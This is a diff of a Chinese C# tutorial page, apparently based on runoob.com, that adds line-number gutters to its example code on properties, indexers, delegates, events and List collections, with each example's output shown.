                                                43
                                                44
                                                45
                                                46
                                                47
                                                48
                                                49
                                                50
                                                51
                                                52
                                                53
                                                54
                                                55
                                                56
                                                57
                                                58
                                                59
                                                60
                                                61
                                                62
                                                63
                                                64
                                                65
                                                66
                                                67
                                                68
                                                69
                                                70
                                                71
                                                72
                                                using System;
                                                namespace runoob
                                                {
                                                class Student
                                                {

                                                private string code = "N.A";
                                                private string name = "not known";
                                                private int age = 0;

                                                // 声明类型为 string 的 Code 属性
                                                public string Code
                                                {
                                                get
                                                {
                                                return code;
                                                }
                                                set
                                                {
                                                code = value;
                                                }
                                                }

                                                // 声明类型为 string 的 Name 属性
                                                public string Name
                                                {
                                                get
                                                {
                                                return name;
                                                }
                                                set
                                                {
                                                name = value;
                                                }
                                                }

                                                // 声明类型为 int 的 Age 属性
                                                public int Age
                                                {
                                                get
                                                {
                                                return age;
                                                }
                                                set
                                                {
                                                age = value;
                                                }
                                                }
                                                public override string ToString()
                                                {
                                                return "Code = " + Code + ", Name = " + Name + ", Age = " + Age;
                                                }
                                                }
                                                class ExampleDemo
                                                {
                                                public static void Main()
                                                {
                                                // 创建一个新的 Student 对象
                                                Student s = new Student();

                                                // 设置 student 的 code、name 和 age
                                                s.Code = "001";
                                                s.Name = "Zara";
                                                s.Age = 9;
                                                Console.WriteLine("Student Info: {0}", s);
                                                // 增加年龄
                                                s.Age += 1;
                                                Console.WriteLine("Student Info: {0}", s);
                                                Console.ReadKey();
                                                }
                                                }
                                                }
                                                +
                                                1
                                                2
                                                Student Info: Code = 001, Name = Zara, Age = 9
                                                Student Info: Code = 001, Name = Zara, Age = 10

                                                ​ 在这段代码中,将 codenameage 设为私有字段,并通过公共属性 CodeNameAge 进行访问的做法,比直接将它们设为公共字段(public fields)有几个优势:

                                                  @@ -1491,21 +1489,21 @@

                                                  抽象属性(Abstract Properties)

                                                  ​ 抽象类可拥有抽象属性,这些属性应在派生类中被实现。下面的程序说明了这点:

                                                  -
                                                  using System;
                                                  namespace runoob
                                                  {
                                                  public abstract class Person
                                                  {
                                                  public abstract string Name
                                                  {
                                                  get;
                                                  set;
                                                  }
                                                  public abstract int Age
                                                  {
                                                  get;
                                                  set;
                                                  }
                                                  }
                                                  class Student : Person
                                                  {

                                                  private string code = "N.A";
                                                  private string name = "N.A";
                                                  private int age = 0;

                                                  // 声明类型为 string 的 Code 属性
                                                  public string Code
                                                  {
                                                  get
                                                  {
                                                  return code;
                                                  }
                                                  set
                                                  {
                                                  code = value;
                                                  }
                                                  }

                                                  // 声明类型为 string 的 Name 属性
                                                  public override string Name
                                                  {
                                                  get
                                                  {
                                                  return name;
                                                  }
                                                  set
                                                  {
                                                  name = value;
                                                  }
                                                  }

                                                  // 声明类型为 int 的 Age 属性
                                                  public override int Age
                                                  {
                                                  get
                                                  {
                                                  return age;
                                                  }
                                                  set
                                                  {
                                                  age = value;
                                                  }
                                                  }
                                                  public override string ToString()
                                                  {
                                                  return "Code = " + Code + ", Name = " + Name + ", Age = " + Age;
                                                  }
                                                  }
                                                  class ExampleDemo
                                                  {
                                                  public static void Main()
                                                  {
                                                  // 创建一个新的 Student 对象
                                                  Student s = new Student();

                                                  // 设置 student 的 code、name 和 age
                                                  s.Code = "001";
                                                  s.Name = "Zara";
                                                  s.Age = 9;
                                                  Console.WriteLine("Student Info:- {0}", s);
                                                  // 增加年龄
                                                  s.Age += 1;
                                                  Console.WriteLine("Student Info:- {0}", s);
                                                  Console.ReadKey();
                                                  }
                                                  }
                                                  }
                                                  -
                                                  Student Info:- Code = 001, Name = Zara, Age = 9
                                                  Student Info:- Code = 001, Name = Zara, Age = 10
                                                  +
                                                  1
                                                  2
                                                  3
                                                  4
                                                  5
                                                  6
                                                  7
                                                  8
                                                  9
                                                  10
                                                  11
                                                  12
                                                  13
                                                  14
                                                  15
                                                  16
                                                  17
                                                  18
                                                  19
                                                  20
                                                  21
                                                  22
                                                  23
                                                  24
                                                  25
                                                  26
                                                  27
                                                  28
                                                  29
                                                  30
                                                  31
                                                  32
                                                  33
                                                  34
                                                  35
                                                  36
                                                  37
                                                  38
                                                  39
                                                  40
                                                  41
                                                  42
                                                  43
                                                  44
                                                  45
                                                  46
                                                  47
                                                  48
                                                  49
                                                  50
                                                  51
                                                  52
                                                  53
                                                  54
                                                  55
                                                  56
                                                  57
                                                  58
                                                  59
                                                  60
                                                  61
                                                  62
                                                  63
                                                  64
                                                  65
                                                  66
                                                  67
                                                  68
                                                  69
                                                  70
                                                  71
                                                  72
                                                  73
                                                  74
                                                  75
                                                  76
                                                  77
                                                  78
                                                  79
                                                  80
                                                  81
                                                  82
                                                  83
                                                  84
                                                  85
                                                  using System;
                                                  namespace runoob
                                                  {
                                                  public abstract class Person
                                                  {
                                                  public abstract string Name
                                                  {
                                                  get;
                                                  set;
                                                  }
                                                  public abstract int Age
                                                  {
                                                  get;
                                                  set;
                                                  }
                                                  }
                                                  class Student : Person
                                                  {

                                                  private string code = "N.A";
                                                  private string name = "N.A";
                                                  private int age = 0;

                                                  // 声明类型为 string 的 Code 属性
                                                  public string Code
                                                  {
                                                  get
                                                  {
                                                  return code;
                                                  }
                                                  set
                                                  {
                                                  code = value;
                                                  }
                                                  }

                                                  // 声明类型为 string 的 Name 属性
                                                  public override string Name
                                                  {
                                                  get
                                                  {
                                                  return name;
                                                  }
                                                  set
                                                  {
                                                  name = value;
                                                  }
                                                  }

                                                  // 声明类型为 int 的 Age 属性
                                                  public override int Age
                                                  {
                                                  get
                                                  {
                                                  return age;
                                                  }
                                                  set
                                                  {
                                                  age = value;
                                                  }
                                                  }
                                                  public override string ToString()
                                                  {
                                                  return "Code = " + Code + ", Name = " + Name + ", Age = " + Age;
                                                  }
                                                  }
                                                  class ExampleDemo
                                                  {
                                                  public static void Main()
                                                  {
                                                  // 创建一个新的 Student 对象
                                                  Student s = new Student();

                                                  // 设置 student 的 code、name 和 age
                                                  s.Code = "001";
                                                  s.Name = "Zara";
                                                  s.Age = 9;
                                                  Console.WriteLine("Student Info:- {0}", s);
                                                  // 增加年龄
                                                  s.Age += 1;
                                                  Console.WriteLine("Student Info:- {0}", s);
                                                  Console.ReadKey();
                                                  }
                                                  }
                                                  }
                                                  +
                                                  1
                                                  2
                                                  Student Info:- Code = 001, Name = Zara, Age = 9
                                                  Student Info:- Code = 001, Name = Zara, Age = 10

                                                  C# 索引器(Indexer)

                                                  索引器(Indexer) 允许一个对象可以像数组一样使用下标的方式来访问。

                                                  ​ 当您为类定义一个索引器时,该类的行为就会像一个 虚拟数组(virtual array) 一样。您可以使用数组访问运算符 [ ] 来访问该类的的成员。

                                                  索引器(Indexer)的用途

                                                  ​ 索引器的行为的声明在某种程度上类似于属性(property)。就像属性(property),您可使用 getset 访问器来定义索引器。但是,属性返回或设置一个特定的数据成员,而索引器返回或设置对象实例的一个特定值。换句话说,它把实例数据分为更小的部分,并索引每个部分,获取或设置每个部分。

                                                  ​ 定义一个属性(property)包括提供属性名称。索引器定义的时候不带有名称,但带有 this 关键字,它指向对象实例。下面的实例演示了这个概念:

                                                  -
                                                  using System;
                                                  namespace IndexerApplication
                                                  {
                                                  class IndexedNames
                                                  {
                                                  private string[] namelist = new string[size];
                                                  static public int size = 10;
                                                  public IndexedNames()
                                                  {
                                                  for (int i = 0; i < size; i++)
                                                  namelist[i] = "N. A.";
                                                  }
                                                  public string this[int index]
                                                  {
                                                  get
                                                  {
                                                  string tmp;

                                                  if (index >= 0 && index <= size - 1)
                                                  {
                                                  tmp = namelist[index];
                                                  }
                                                  else
                                                  {
                                                  tmp = "";
                                                  }

                                                  return (tmp);
                                                  }
                                                  set
                                                  {
                                                  if (index >= 0 && index <= size - 1)
                                                  {
                                                  namelist[index] = value;
                                                  }
                                                  }
                                                  }

                                                  static void Main(string[] args)
                                                  {
                                                  IndexedNames names = new IndexedNames();
                                                  names[0] = "Zara";
                                                  names[1] = "Riz";
                                                  names[2] = "Nuha";
                                                  names[3] = "Asif";
                                                  names[4] = "Davinder";
                                                  names[5] = "Sunil";
                                                  names[6] = "Rubic";
                                                  for (int i = 0; i < IndexedNames.size; i++)
                                                  {
                                                  Console.WriteLine(names[i]);
                                                  }
                                                  Console.ReadKey();
                                                  }
                                                  }
                                                  }
                                                  -
                                                  Zara
                                                  Riz
                                                  Nuha
                                                  Asif
                                                  Davinder
                                                  Sunil
                                                  Rubic
                                                  N. A.
                                                  N. A.
                                                  N. A.
                                                  +
                                                  1
                                                  2
                                                  3
                                                  4
                                                  5
                                                  6
                                                  7
                                                  8
                                                  9
                                                  10
                                                  11
                                                  12
                                                  13
                                                  14
                                                  15
                                                  16
                                                  17
                                                  18
                                                  19
                                                  20
                                                  21
                                                  22
                                                  23
                                                  24
                                                  25
                                                  26
                                                  27
                                                  28
                                                  29
                                                  30
                                                  31
                                                  32
                                                  33
                                                  34
                                                  35
                                                  36
                                                  37
                                                  38
                                                  39
                                                  40
                                                  41
                                                  42
                                                  43
                                                  44
                                                  45
                                                  46
                                                  47
                                                  48
                                                  49
                                                  50
                                                  51
                                                  52
                                                  53
                                                  54
                                                  55
                                                  56
                                                  using System;
                                                  namespace IndexerApplication
                                                  {
                                                  class IndexedNames
                                                  {
                                                  private string[] namelist = new string[size];
                                                  static public int size = 10;
                                                  public IndexedNames()
                                                  {
                                                  for (int i = 0; i < size; i++)
                                                  namelist[i] = "N. A.";
                                                  }
                                                  public string this[int index]
                                                  {
                                                  get
                                                  {
                                                  string tmp;

                                                  if (index >= 0 && index <= size - 1)
                                                  {
                                                  tmp = namelist[index];
                                                  }
                                                  else
                                                  {
                                                  tmp = "";
                                                  }

                                                  return (tmp);
                                                  }
                                                  set
                                                  {
                                                  if (index >= 0 && index <= size - 1)
                                                  {
                                                  namelist[index] = value;
                                                  }
                                                  }
                                                  }

                                                  static void Main(string[] args)
                                                  {
                                                  IndexedNames names = new IndexedNames();
                                                  names[0] = "Zara";
                                                  names[1] = "Riz";
                                                  names[2] = "Nuha";
                                                  names[3] = "Asif";
                                                  names[4] = "Davinder";
                                                  names[5] = "Sunil";
                                                  names[6] = "Rubic";
                                                  for (int i = 0; i < IndexedNames.size; i++)
                                                  {
                                                  Console.WriteLine(names[i]);
                                                  }
                                                  Console.ReadKey();
                                                  }
                                                  }
                                                  }
                                                  +
                                                  1
                                                  2
                                                  3
                                                  4
                                                  5
                                                  6
                                                  7
                                                  8
                                                  9
                                                  10
                                                  Zara
                                                  Riz
                                                  Nuha
                                                  Asif
                                                  Davinder
                                                  Sunil
                                                  Rubic
                                                  N. A.
                                                  N. A.
                                                  N. A.

                                                  重载索引器(Indexer)

                                                  ​ 索引器(Indexer)可被重载。索引器声明的时候也可带有多个参数,且每个参数可以是不同的类型。没有必要让索引器必须是整型的。C# 允许索引器可以是其他类型,例如,字符串类型。

                                                  ​ 下面的实例演示了重载索引器:

                                                  -
                                                  using System;
                                                  namespace IndexerApplication
                                                  {
                                                  class IndexedNames
                                                  {
                                                  private string[] namelist = new string[size];
                                                  static public int size = 10;
                                                  public IndexedNames()
                                                  {
                                                  for (int i = 0; i < size; i++)
                                                  {
                                                  namelist[i] = "N. A.";
                                                  }
                                                  }
                                                  public string this[int index]
                                                  {
                                                  get
                                                  {
                                                  string tmp;

                                                  if (index >= 0 && index <= size - 1)
                                                  {
                                                  tmp = namelist[index];
                                                  }
                                                  else
                                                  {
                                                  tmp = "";
                                                  }

                                                  return (tmp);
                                                  }
                                                  set
                                                  {
                                                  if (index >= 0 && index <= size - 1)
                                                  {
                                                  namelist[index] = value;
                                                  }
                                                  }
                                                  }
                                                  public int this[string name]
                                                  {
                                                  get
                                                  {
                                                  int index = 0;
                                                  while (index < size)
                                                  {
                                                  if (namelist[index] == name)
                                                  {
                                                  return index;
                                                  }
                                                  index++;
                                                  }
                                                  return index;
                                                  }

                                                  }

                                                  static void Main(string[] args)
                                                  {
                                                  IndexedNames names = new IndexedNames();
                                                  names[0] = "Zara";
                                                  names[1] = "Riz";
                                                  names[2] = "Nuha";
                                                  names[3] = "Asif";
                                                  names[4] = "Davinder";
                                                  names[5] = "Sunil";
                                                  names[6] = "Rubic";
                                                  // 使用带有 int 参数的第一个索引器
                                                  for (int i = 0; i < IndexedNames.size; i++)
                                                  {
                                                  Console.WriteLine(names[i]);
                                                  }
                                                  // 使用带有 string 参数的第二个索引器
                                                  Console.WriteLine(names["Nuha"]);
                                                  Console.ReadKey();
                                                  }
                                                  }
                                                  }
                                                  -
                                                  Zara
                                                  Riz
                                                  Nuha
                                                  Asif
                                                  Davinder
                                                  Sunil
                                                  Rubic
                                                  N. A.
                                                  N. A.
                                                  N. A.
                                                  2
                                                  +
                                                  1
                                                  2
                                                  3
                                                  4
                                                  5
                                                  6
                                                  7
                                                  8
                                                  9
                                                  10
                                                  11
                                                  12
                                                  13
                                                  14
                                                  15
                                                  16
                                                  17
                                                  18
                                                  19
                                                  20
                                                  21
                                                  22
                                                  23
                                                  24
                                                  25
                                                  26
                                                  27
                                                  28
                                                  29
                                                  30
                                                  31
                                                  32
                                                  33
                                                  34
                                                  35
                                                  36
                                                  37
                                                  38
                                                  39
                                                  40
                                                  41
                                                  42
                                                  43
                                                  44
                                                  45
                                                  46
                                                  47
                                                  48
                                                  49
                                                  50
                                                  51
                                                  52
                                                  53
                                                  54
                                                  55
                                                  56
                                                  57
                                                  58
                                                  59
                                                  60
                                                  61
                                                  62
                                                  63
                                                  64
                                                  65
                                                  66
                                                  67
                                                  68
                                                  69
                                                  70
                                                  71
                                                  72
                                                  73
                                                  74
                                                  75
                                                  76
                                                  77
                                                  78
                                                  using System;
                                                  namespace IndexerApplication
                                                  {
                                                  class IndexedNames
                                                  {
                                                  private string[] namelist = new string[size];
                                                  static public int size = 10;
                                                  public IndexedNames()
                                                  {
                                                  for (int i = 0; i < size; i++)
                                                  {
                                                  namelist[i] = "N. A.";
                                                  }
                                                  }
                                                  public string this[int index]
                                                  {
                                                  get
                                                  {
                                                  string tmp;

                                                  if (index >= 0 && index <= size - 1)
                                                  {
                                                  tmp = namelist[index];
                                                  }
                                                  else
                                                  {
                                                  tmp = "";
                                                  }

                                                  return (tmp);
                                                  }
                                                  set
                                                  {
                                                  if (index >= 0 && index <= size - 1)
                                                  {
                                                  namelist[index] = value;
                                                  }
                                                  }
                                                  }
                                                  public int this[string name]
                                                  {
                                                  get
                                                  {
                                                  int index = 0;
                                                  while (index < size)
                                                  {
                                                  if (namelist[index] == name)
                                                  {
                                                  return index;
                                                  }
                                                  index++;
                                                  }
                                                  return index;
                                                  }

                                                  }

                                                  static void Main(string[] args)
                                                  {
                                                  IndexedNames names = new IndexedNames();
                                                  names[0] = "Zara";
                                                  names[1] = "Riz";
                                                  names[2] = "Nuha";
                                                  names[3] = "Asif";
                                                  names[4] = "Davinder";
                                                  names[5] = "Sunil";
                                                  names[6] = "Rubic";
                                                  // 使用带有 int 参数的第一个索引器
                                                  for (int i = 0; i < IndexedNames.size; i++)
                                                  {
                                                  Console.WriteLine(names[i]);
                                                  }
                                                  // 使用带有 string 参数的第二个索引器
                                                  Console.WriteLine(names["Nuha"]);
                                                  Console.ReadKey();
                                                  }
                                                  }
                                                  }
                                                  +
                                                  1
                                                  2
                                                  3
                                                  4
                                                  5
                                                  6
                                                  7
                                                  8
                                                  9
                                                  10
                                                  11
                                                  Zara
                                                  Riz
                                                  Nuha
                                                  Asif
                                                  Davinder
                                                  Sunil
                                                  Rubic
                                                  N. A.
                                                  N. A.
                                                  N. A.
                                                  2

                                                  C# 委托(Delegate)

                                                  • C# 委托(Delegate) | 菜鸟教程 (runoob.com)
                                                  • @@ -1513,17 +1511,17 @@

                                                    实例化委托(Delegate)

                                                    -
                                                    using System;

                                                    delegate int NumberChanger(int n);
                                                    namespace DelegateAppl
                                                    {
                                                    class TestDelegate
                                                    {
                                                    static int num = 10;
                                                    public static int AddNum(int p)
                                                    {
                                                    num += p;
                                                    return num;
                                                    }

                                                    public static int MultNum(int q)
                                                    {
                                                    num *= q;
                                                    return num;
                                                    }
                                                    public static int getNum()
                                                    {
                                                    return num;
                                                    }

                                                    static void Main(string[] args)
                                                    {
                                                    // 创建委托实例
                                                    NumberChanger nc1 = new NumberChanger(AddNum);
                                                    NumberChanger nc2 = new NumberChanger(MultNum);
                                                    // 使用委托对象调用方法
                                                    nc1(25); // 10 + 15 = 25
                                                    Console.WriteLine("Value of Num: {0}", getNum());
                                                    nc2(5); // 25 * 5 = 175
                                                    Console.WriteLine("Value of Num: {0}", getNum());
                                                    Console.ReadKey();
                                                    }
                                                    }
                                                    }
                                                    -
                                                    Value of Num: 35
                                                    Value of Num: 175
                                                    +
                                                    1
                                                    2
                                                    3
                                                    4
                                                    5
                                                    6
                                                    7
                                                    8
                                                    9
                                                    10
                                                    11
                                                    12
                                                    13
                                                    14
                                                    15
                                                    16
                                                    17
                                                    18
                                                    19
                                                    20
                                                    21
                                                    22
                                                    23
                                                    24
                                                    25
                                                    26
                                                    27
                                                    28
                                                    29
                                                    30
                                                    31
                                                    32
                                                    33
                                                    34
                                                    35
                                                    36
                                                    37
                                                    38
                                                    using System;

                                                    delegate int NumberChanger(int n);
                                                    namespace DelegateAppl
                                                    {
                                                    class TestDelegate
                                                    {
                                                    static int num = 10;
                                                    public static int AddNum(int p)
                                                    {
                                                    num += p;
                                                    return num;
                                                    }

                                                    public static int MultNum(int q)
                                                    {
                                                    num *= q;
                                                    return num;
                                                    }
                                                    public static int getNum()
                                                    {
                                                    return num;
                                                    }

                                                    static void Main(string[] args)
                                                    {
                                                    // 创建委托实例
                                                    NumberChanger nc1 = new NumberChanger(AddNum);
                                                    NumberChanger nc2 = new NumberChanger(MultNum);
                                                    // 使用委托对象调用方法
                                                    nc1(25); // 10 + 15 = 25
                                                    Console.WriteLine("Value of Num: {0}", getNum());
                                                    nc2(5); // 25 * 5 = 175
                                                    Console.WriteLine("Value of Num: {0}", getNum());
                                                    Console.ReadKey();
                                                    }
                                                    }
                                                    }
                                                    +
                                                    1
                                                    2
                                                    Value of Num: 35
                                                    Value of Num: 175

                                                    委托的多播(Multicasting of a Delegate)

                                                    ​ 委托对象可使用 “+” 运算符进行合并。一个合并委托调用它所合并的两个委托。只有相同类型的委托可被合并。“-” 运算符可用于从合并的委托中移除组件委托。

                                                    ​ 使用委托的这个有用的特点,您可以创建一个委托被调用时要调用的方法的调用列表。这被称为委托的 多播(multicasting),也叫组播。下面的程序演示了委托的多播:

                                                    -
                                                    using System;

                                                    delegate int NumberChanger(int n);
                                                    namespace DelegateAppl
                                                    {
                                                    class TestDelegate
                                                    {
                                                    static int num = 10;
                                                    public static int AddNum(int p)
                                                    {
                                                    num += p;
                                                    return num;
                                                    }

                                                    public static int MultNum(int q)
                                                    {
                                                    num *= q;
                                                    return num;
                                                    }
                                                    public static int getNum()
                                                    {
                                                    return num;
                                                    }

                                                    static void Main(string[] args)
                                                    {
                                                    // 创建委托实例
                                                    NumberChanger nc;
                                                    NumberChanger nc1 = new NumberChanger(AddNum);
                                                    NumberChanger nc2 = new NumberChanger(MultNum);
                                                    nc = nc1;
                                                    nc += nc2;
                                                    // 调用多播
                                                    nc(5); // (10 + 5) * 5 = 75
                                                    Console.WriteLine("Value of Num: {0}", getNum());
                                                    Console.ReadKey();
                                                    }
                                                    }
                                                    }
                                                    -
                                                    Value of Num: 75
                                                    +
                                                    1
                                                    2
                                                    3
                                                    4
                                                    5
                                                    6
                                                    7
                                                    8
                                                    9
                                                    10
                                                    11
                                                    12
                                                    13
                                                    14
                                                    15
                                                    16
                                                    17
                                                    18
                                                    19
                                                    20
                                                    21
                                                    22
                                                    23
                                                    24
                                                    25
                                                    26
                                                    27
                                                    28
                                                    29
                                                    30
                                                    31
                                                    32
                                                    33
                                                    34
                                                    35
                                                    36
                                                    37
                                                    38
                                                    39
                                                    using System;

                                                    delegate int NumberChanger(int n);
                                                    namespace DelegateAppl
                                                    {
                                                    class TestDelegate
                                                    {
                                                    static int num = 10;
                                                    public static int AddNum(int p)
                                                    {
                                                    num += p;
                                                    return num;
                                                    }

                                                    public static int MultNum(int q)
                                                    {
                                                    num *= q;
                                                    return num;
                                                    }
                                                    public static int getNum()
                                                    {
                                                    return num;
                                                    }

                                                    static void Main(string[] args)
                                                    {
                                                    // 创建委托实例
                                                    NumberChanger nc;
                                                    NumberChanger nc1 = new NumberChanger(AddNum);
                                                    NumberChanger nc2 = new NumberChanger(MultNum);
                                                    nc = nc1;
                                                    nc += nc2;
                                                    // 调用多播
                                                    nc(5); // (10 + 5) * 5 = 75
                                                    Console.WriteLine("Value of Num: {0}", getNum());
                                                    Console.ReadKey();
                                                    }
                                                    }
                                                    }
                                                    +
                                                    1
                                                    Value of Num: 75

                                                    委托(Delegate)的用途

                                                    ​ 下面的实例演示了委托的用法。委托 printString 可用于引用带有一个字符串作为输入的方法,并不返回任何东西。

                                                    ​ 我们使用这个委托来调用两个方法(将函数变成一个参数),第一个把字符串打印到控制台,第二个把字符串打印到文件:

                                                    -
                                                    using System;
                                                    using System.IO;

                                                    namespace DelegateAppl
                                                    {
                                                    class PrintString
                                                    {
                                                    static FileStream fs;
                                                    static StreamWriter sw;
                                                    // 委托声明
                                                    public delegate void printString(string s);

                                                    // 该方法打印到控制台
                                                    public static void WriteToScreen(string str)
                                                    {
                                                    Console.WriteLine("The String is: {0}", str);
                                                    }
                                                    // 该方法打印到文件
                                                    public static void WriteToFile(string s)
                                                    {
                                                    fs = new FileStream("c:\\message.txt", FileMode.Append, FileAccess.Write);
                                                    sw = new StreamWriter(fs);
                                                    sw.WriteLine(s);
                                                    sw.Flush();
                                                    sw.Close();
                                                    fs.Close();
                                                    }
                                                    // 该方法把委托作为参数,并使用它调用方法
                                                    public static void sendString(printString ps)
                                                    {
                                                    ps("Hello World");
                                                    }
                                                    static void Main(string[] args)
                                                    {
                                                    printString ps1 = new printString(WriteToScreen);
                                                    printString ps2 = new printString(WriteToFile);
                                                    sendString(ps1);
                                                    sendString(ps2);
                                                    Console.ReadKey();
                                                    }
                                                    }
                                                    }
                                                    +
                                                    1
                                                    2
                                                    3
                                                    4
                                                    5
                                                    6
                                                    7
                                                    8
                                                    9
                                                    10
                                                    11
                                                    12
                                                    13
                                                    14
                                                    15
                                                    16
                                                    17
                                                    18
                                                    19
                                                    20
                                                    21
                                                    22
                                                    23
                                                    24
                                                    25
                                                    26
                                                    27
                                                    28
                                                    29
                                                    30
                                                    31
                                                    32
                                                    33
                                                    34
                                                    35
                                                    36
                                                    37
                                                    38
                                                    39
                                                    40
                                                    41
                                                    42
                                                    using System;
                                                    using System.IO;

                                                    namespace DelegateAppl
                                                    {
                                                    class PrintString
                                                    {
                                                    static FileStream fs;
                                                    static StreamWriter sw;
                                                    // 委托声明
                                                    public delegate void printString(string s);

                                                    // 该方法打印到控制台
                                                    public static void WriteToScreen(string str)
                                                    {
                                                    Console.WriteLine("The String is: {0}", str);
                                                    }
                                                    // 该方法打印到文件
                                                    public static void WriteToFile(string s)
                                                    {
                                                    fs = new FileStream("c:\\message.txt", FileMode.Append, FileAccess.Write);
                                                    sw = new StreamWriter(fs);
                                                    sw.WriteLine(s);
                                                    sw.Flush();
                                                    sw.Close();
                                                    fs.Close();
                                                    }
                                                    // 该方法把委托作为参数,并使用它调用方法
                                                    public static void sendString(printString ps)
                                                    {
                                                    ps("Hello World");
                                                    }
                                                    static void Main(string[] args)
                                                    {
                                                    printString ps1 = new printString(WriteToScreen);
                                                    printString ps2 = new printString(WriteToFile);
                                                    sendString(ps1);
                                                    sendString(ps2);
                                                    Console.ReadKey();
                                                    }
                                                    }
                                                    }

                                                    C# 事件(Event)

                                                    • C# 事件(Event) | 菜鸟教程 (runoob.com)
                                                    • @@ -1536,12 +1534,12 @@

                                                      声明事件(Event)

                                                      ​ 在类的内部声明事件,首先必须声明该事件的委托类型。例如:

                                                      -
                                                      public delegate void BoilerLogHandler(string status);
                                                      +
                                                      1
                                                      public delegate void BoilerLogHandler(string status);

                                                      ​ 然后,声明事件本身,使用 event 关键字:

                                                      -
                                                      // 基于上面的委托定义事件
                                                      public event BoilerLogHandler BoilerEventLog;
                                                      +
                                                      1
                                                      2
                                                      // 基于上面的委托定义事件
                                                      public event BoilerLogHandler BoilerEventLog;

                                                      示例

                                                      -
                                                      using System;
                                                      namespace SimpleEvent
                                                      {
                                                      using System;
                                                      /***********发布器类***********/
                                                      public class EventTest
                                                      {
                                                      private int value;

                                                      public delegate void NumManipulationHandler();

                                                      public event NumManipulationHandler ChangeNum;

                                                      protected virtual void OnNumChanged() // 为了允许子类(如果有的话)重写这个方法
                                                      {
                                                      if (ChangeNum != null)
                                                      {
                                                      ChangeNum(); /* 事件被触发,派发事件 ChangeNum */
                                                      }
                                                      else
                                                      {
                                                      Console.WriteLine("event not fire");
                                                      Console.ReadKey(); /* 回车继续 */
                                                      }
                                                      }


                                                      public EventTest() // 构造函数
                                                      {
                                                      int n = 5;
                                                      SetValue(n);
                                                      }


                                                      public void SetValue(int n)
                                                      {
                                                      if (value != n) // 如果数据更新:
                                                      {
                                                      value = n;
                                                      OnNumChanged();
                                                      }
                                                      }
                                                      }


                                                      /***********订阅器类***********/

                                                      public class subscribEvent
                                                      {
                                                      public void printf()
                                                      {
                                                      Console.WriteLine("event fire");
                                                      Console.ReadKey(); /* 回车继续 */
                                                      }
                                                      }

                                                      /***********触发***********/
                                                      public class MainClass
                                                      {
                                                      public static void Main()
                                                      {
                                                      EventTest e = new EventTest(); /* 实例化对象,构造函数将执行一次 OnNumChanged(),第一次没有触发事件 */
                                                      subscribEvent v = new subscribEvent(); /* 实例化对象 */
                                                      e.ChangeNum += new EventTest.NumManipulationHandler(v.printf); /* 注册:接收到消息时,执行函数:printf() */
                                                      e.SetValue(7);
                                                      e.SetValue(11);
                                                      e.SetValue(11);
                                                      e.SetValue(9);
                                                      }
                                                      }
                                                      }
                                                      -
                                                      event not fire
                                                      event fire
                                                      event fire
                                                      event fire
                                                      +
                                                      1
                                                      2
                                                      3
                                                      4
                                                      5
                                                      6
                                                      7
                                                      8
                                                      9
                                                      10
                                                      11
                                                      12
                                                      13
                                                      14
                                                      15
                                                      16
                                                      17
                                                      18
                                                      19
                                                      20
                                                      21
                                                      22
                                                      23
                                                      24
                                                      25
                                                      26
                                                      27
                                                      28
                                                      29
                                                      30
                                                      31
                                                      32
                                                      33
                                                      34
                                                      35
                                                      36
                                                      37
                                                      38
                                                      39
                                                      40
                                                      41
                                                      42
                                                      43
                                                      44
                                                      45
                                                      46
                                                      47
                                                      48
                                                      49
                                                      50
                                                      51
                                                      52
                                                      53
                                                      54
                                                      55
                                                      56
                                                      57
                                                      58
                                                      59
                                                      60
                                                      61
                                                      62
                                                      63
                                                      64
                                                      65
                                                      66
                                                      67
                                                      68
                                                      69
                                                      70
                                                      71
                                                      using System;
                                                      namespace SimpleEvent
                                                      {
                                                      using System;
                                                      /***********发布器类***********/
                                                      public class EventTest
                                                      {
                                                      private int value;

                                                      public delegate void NumManipulationHandler();

                                                      public event NumManipulationHandler ChangeNum;

                                                      protected virtual void OnNumChanged() // 为了允许子类(如果有的话)重写这个方法
                                                      {
                                                      if (ChangeNum != null)
                                                      {
                                                      ChangeNum(); /* 事件被触发,派发事件 ChangeNum */
                                                      }
                                                      else
                                                      {
                                                      Console.WriteLine("event not fire");
                                                      Console.ReadKey(); /* 回车继续 */
                                                      }
                                                      }


                                                      public EventTest() // 构造函数
                                                      {
                                                      int n = 5;
                                                      SetValue(n);
                                                      }


                                                      public void SetValue(int n)
                                                      {
                                                      if (value != n) // 如果数据更新:
                                                      {
                                                      value = n;
                                                      OnNumChanged();
                                                      }
                                                      }
                                                      }


                                                      /***********订阅器类***********/

                                                      public class subscribEvent
                                                      {
                                                      public void printf()
                                                      {
                                                      Console.WriteLine("event fire");
                                                      Console.ReadKey(); /* 回车继续 */
                                                      }
                                                      }

                                                      /***********触发***********/
                                                      public class MainClass
                                                      {
                                                      public static void Main()
                                                      {
                                                      EventTest e = new EventTest(); /* 实例化对象,构造函数将执行一次 OnNumChanged(),第一次没有触发事件 */
                                                      subscribEvent v = new subscribEvent(); /* 实例化对象 */
                                                      e.ChangeNum += new EventTest.NumManipulationHandler(v.printf); /* 注册:接收到消息时,执行函数:printf() */
                                                      e.SetValue(7);
                                                      e.SetValue(11);
                                                      e.SetValue(11);
                                                      e.SetValue(9);
                                                      }
                                                      }
                                                      }
                                                      +
                                                      1
                                                      2
                                                      3
                                                      4
                                                      event not fire
                                                      event fire
                                                      event fire
                                                      event fire

                                                      C# 集合(Collection)

                                                      • C# 集合(Collection) | 菜鸟教程 (runoob.com)
                                                      • @@ -1555,8 +1553,8 @@

                                                        List

                                                        -
                                                        using System;
                                                        using static System.Console;
                                                        using System.Collections.Generic;
                                                        namespace HelloWorldApplication
                                                        {
                                                        class HelloWorld
                                                        {
                                                        static void Main(string[] args)
                                                        {
                                                        var a = new List<int>();
                                                        a.Add(2);
                                                        a.Add(6);
                                                        a.Add(2);
                                                        a.Add(10);
                                                        Console.WriteLine($"第一个数为{a[0]}");
                                                        a.Remove(2);//删去第一个匹配此条件的项
                                                        a.Sort();
                                                        foreach (var a2 in a)
                                                        {
                                                        WriteLine(a2);
                                                        }
                                                        bool a3 = a.Contains(2);
                                                        WriteLine(a3);
                                                        Console.ReadKey();
                                                        }
                                                        }
                                                        }
                                                        -
                                                        第一个数为2
                                                        2
                                                        6
                                                        10
                                                        True
                                                        +
                                                        1
                                                        2
                                                        3
                                                        4
                                                        5
                                                        6
                                                        7
                                                        8
                                                        9
                                                        10
                                                        11
                                                        12
                                                        13
                                                        14
                                                        15
                                                        16
                                                        17
                                                        18
                                                        19
                                                        20
                                                        21
                                                        22
                                                        23
                                                        24
                                                        25
                                                        26
                                                        27
                                                        using System;
